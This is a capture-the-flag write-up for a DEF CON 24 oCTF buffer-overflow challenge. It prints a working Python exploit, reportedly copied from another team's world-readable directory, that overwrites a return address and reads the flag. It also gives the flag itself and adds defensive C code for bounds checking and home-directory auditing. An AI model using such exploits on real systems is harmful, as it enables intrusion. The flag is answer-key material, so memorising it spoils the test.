Tags: overflow buffer
Rating:
Description:
Baby's first Buffer Overflow (https://en.wikipedia.org/wiki/Buffer_overflow).
Server: 172.31.1.39:1618
Binary: 172.31.0.10/tyro_overflow1_0601e9d93a2ff84ae7a85dc199fa8233
Part of the infrastructure provided at Defcon 24's oCTF was a jumpbox, with an account for every team.
While using the jumpbox was not mandatory, it was a convenient place to put files for your team to use.
What may not have been immediately obvious was that your team's home directory was world readable.
Fortunately, team lbcb left their solution to this challenge in their home directory.
To get the flag, simply run another team's exploit:
```python
#!/usr/bin/env python2
# Stolen from lbcb
import struct
#from sock import Sock
from socket import create_connection
import time

# Address the overflow redirects execution to. The payload is this 4-byte
# little-endian value repeated 150 times (600 bytes), so the saved return
# address is overwritten with it wherever it sits past the end of the buffer.
success_addr = 0x0804858D
pl = 150 * struct.pack('<I', success_addr)

#s = Sock(('172.31.1.39:1618'), timeout=5)
s = create_connection(('172.31.1.39', 1618), timeout=5)
print s.recv(1024)                      # service banner / prompt
s.send(pl + '\n')                       # overflow the input buffer
s.send('cat /home/challenge/flag\n')    # then ask for the flag file
time.sleep(1)
print s.recv(2048)                      # flag comes back here
```
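For the defensive side of a "baby's first overflow" like this one, here is an added C example (not code from this writeup, from lbcb, or from the challenge binary, whose source is not on the page) showing the classic vulnerable pattern next to a hardened handler. The buffer size `NAME_LEN`, the function names and the 600-byte test input are assumptions chosen to mirror the 150 x 4-byte payload in the script above.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define NAME_LEN 64   /* assumed size of the fixed stack buffer in both versions */

/*
 * Vulnerable pattern (shown for contrast, not called below): the line is
 * copied into a fixed-size stack buffer with no length check.  Any input of
 * NAME_LEN bytes or more runs past the buffer into the saved frame pointer
 * and return address, which is what a payload made of one repeated address
 * relies on.
 */
void vulnerable_greet(const char *line) {
    char name[NAME_LEN];
    strcpy(name, line);              /* no bound: overflow on long input */
    printf("hello %s\n", name);
}

/*
 * Hardened copy: refuses input that does not fit (leaving room for the
 * terminating NUL) instead of truncating silently, and never writes beyond
 * dstsz bytes of dst.  Returns 0 on success, -1 when the input is rejected.
 */
int copy_line_bounded(char *dst, size_t dstsz, const char *src, size_t srclen) {
    if (dst == NULL || src == NULL || dstsz == 0 || srclen >= dstsz)
        return -1;
    memcpy(dst, src, srclen);
    dst[srclen] = '\0';
    return 0;
}

/* Same handler as above, built on the bounded copy.  Returns 0 when the
 * line was accepted, -1 when it was rejected as too long. */
int hardened_greet(const char *line, size_t len) {
    char name[NAME_LEN];
    if (copy_line_bounded(name, sizeof name, line, len) != 0) {
        fprintf(stderr, "rejected: %zu bytes does not fit a %d-byte field\n",
                len, NAME_LEN - 1);
        return -1;
    }
    printf("hello %s\n", name);
    return 0;
}

int main(void) {
    /* Constructed input: a 600-byte line, the same length as the
     * 150 x 4-byte payload the script above sends. */
    char big[600];
    memset(big, 'A', sizeof big);
    hardened_greet("lbcb", 4);                               /* accepted */
    return hardened_greet(big, sizeof big) == -1 ? 0 : 1;    /* rejected */
}
```

The rejected path is the whole point: the oversized line never reaches the stack frame, so there is no saved return address to overwrite. Two related caveats: `strncpy` alone is a common half-fix because it does not guarantee NUL termination, and compiling with `-fstack-protector-strong` adds a canary that turns a successful overwrite into an abort rather than a jump, which is defence in depth, not a substitute for the bound check.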
Answer:
only_T3h_very_bestOverflowz
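The jumpbox detail above (every team's home directory world readable) is the kind of thing an administrator of a shared host would want to audit before handing out accounts. The following is an added C example, not part of the writeup or the oCTF infrastructure, that checks the "other" read bit on each subdirectory of a parent such as /home. The parent path, the constructed `/tmp/home_audit_<pid>` tree and the `team_a`/`team_b` names are assumptions for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* 1 if `path` is a directory whose mode grants read to "other", 0 if it is a
 * directory without that bit (or not a directory), -1 if stat() fails.  This
 * inspects the permission bits themselves, so the answer is the same whether
 * or not the caller happens to be root. */
int dir_is_world_readable(const char *path) {
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    if (!S_ISDIR(st.st_mode))
        return 0;
    return (st.st_mode & S_IROTH) ? 1 : 0;
}

/* Walks the immediate subdirectories of `parent` (e.g. "/home"), prints each
 * world-readable one with the chmod that would close it, and returns how many
 * it found, or -1 if `parent` cannot be opened. */
int count_world_readable_homes(const char *parent) {
    DIR *d = opendir(parent);
    if (d == NULL)
        return -1;
    int found = 0;
    struct dirent *e;
    char full[4096];
    while ((e = readdir(d)) != NULL) {
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
            continue;
        snprintf(full, sizeof full, "%s/%s", parent, e->d_name);
        if (dir_is_world_readable(full) == 1) {
            printf("world-readable: %s  (fix: chmod o-rx %s)\n", full, full);
            found++;
        }
    }
    closedir(d);
    return found;
}

/* Creates a directory with exactly `mode`, overriding the umask, so the
 * demonstration tree below is deterministic. */
int make_dir_with_mode(const char *path, mode_t mode) {
    if (mkdir(path, mode) != 0)
        return -1;
    return chmod(path, mode);
}

/* Builds a constructed /tmp tree standing in for /home: one team directory
 * left at the common 0755 default and one locked down to 0750.  Writes the
 * tree's path into `base` and returns the number of world-readable entries
 * the audit reports (expected: 1), or -1 on setup failure. */
int demo_audit(char *base, size_t basesz) {
    char team_a[4200], team_b[4200];
    snprintf(base, basesz, "/tmp/home_audit_%ld", (long)getpid());
    if (make_dir_with_mode(base, 0755) != 0)
        return -1;
    snprintf(team_a, sizeof team_a, "%s/team_a", base);
    snprintf(team_b, sizeof team_b, "%s/team_b", base);
    if (make_dir_with_mode(team_a, 0755) != 0 ||
        make_dir_with_mode(team_b, 0750) != 0)
        return -1;
    return count_world_readable_homes(base);
}

int main(void) {
    char base[64];
    int n = demo_audit(base, sizeof base);
    printf("%d world-readable home(s) under %s\n", n, base);
    return n == 1 ? 0 : 1;
}
```

Only the read bit is tested because that is what let another team's files be listed and copied here; a directory that is world-executable but not world-readable still lets a guessed filename be opened, so the suggested `chmod o-rx` removes both bits.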